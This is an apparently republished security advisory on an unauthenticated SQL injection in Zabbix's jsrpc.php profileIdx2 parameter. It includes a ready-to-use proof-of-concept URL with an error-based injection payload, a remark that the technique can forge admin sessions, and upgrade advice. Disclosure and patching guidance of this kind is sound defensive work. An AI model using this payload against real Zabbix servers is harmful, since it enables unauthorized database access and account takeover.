How to Exploit and Patch Zabbix’s JSRPC ProfileIdx2 SQL Injection Vulnerability

This article explains the unauthenticated SQL injection flaw in Zabbix's JSRPC profileIdx2 parameter, details its high impact on versions 2.2.x and 3.0.0‑3.0.3, provides a step‑by‑step proof‑of‑concept exploit, and recommends upgrading to version 3.0.4 to remediate the issue.

ITPUB
ITPUB
ITPUB
How to Exploit and Patch Zabbix’s JSRPC ProfileIdx2 SQL Injection Vulnerability

Vulnerability Overview

Zabbix is an open‑source enterprise‑grade monitoring solution. A SQL injection flaw exists in the JSRPC profileIdx2 parameter, allowing unauthenticated attackers to execute arbitrary SQL and gain OS‑level access when the guest account is enabled (default empty password).

Impact Assessment

Attack cost: low

Severity: high

Authentication required: none

Affected versions: 2.2.x, 3.0.0‑3.0.3 (other versions untested)

Proof‑of‑Concept Exploit

Append the following URL to a reachable Zabbix instance (replace {HOST} with the target address):

http://{HOST}/jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17

The response contains the MD5 hash c4ca4238a0b923820dcc509a6f75849b, confirming the vulnerability.

Proof of concept result
Proof of concept result

Additional Exploitation Notes

Experienced attackers can craft error‑based SQL payloads to bypass password hashes or forge admin session IDs to hijack the admin account directly.

Mitigation

Upgrade Zabbix to version 3.0.4 or later, which includes the fix for this issue.

Security Recommendation

Monitoring systems protect critical assets; a compromised Zabbix instance can facilitate deeper network intrusion. Administrators should apply the patch promptly and disable or secure the guest account.

Reference

http://seclists.org/fulldisclosure/2016/Aug/82
Original Source

Signed-in readers can open the original source through BestHub's protected redirect.

Sign in to view source
Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contactadmin@besthub.devand we will review it promptly.

SQL injectioninformation securitypatchVulnerabilityExploitZabbix
ITPUB
Written by

ITPUB

Official ITPUB account sharing technical insights, community news, and exciting events.

0 followers
Reader feedback

How this landed with the community

Sign in to like

Rate this article

Was this worth your time?

Sign in to rate
Discussion

0 Comments

Thoughtful readers leave field notes, pushback, and hard-won operational detail here.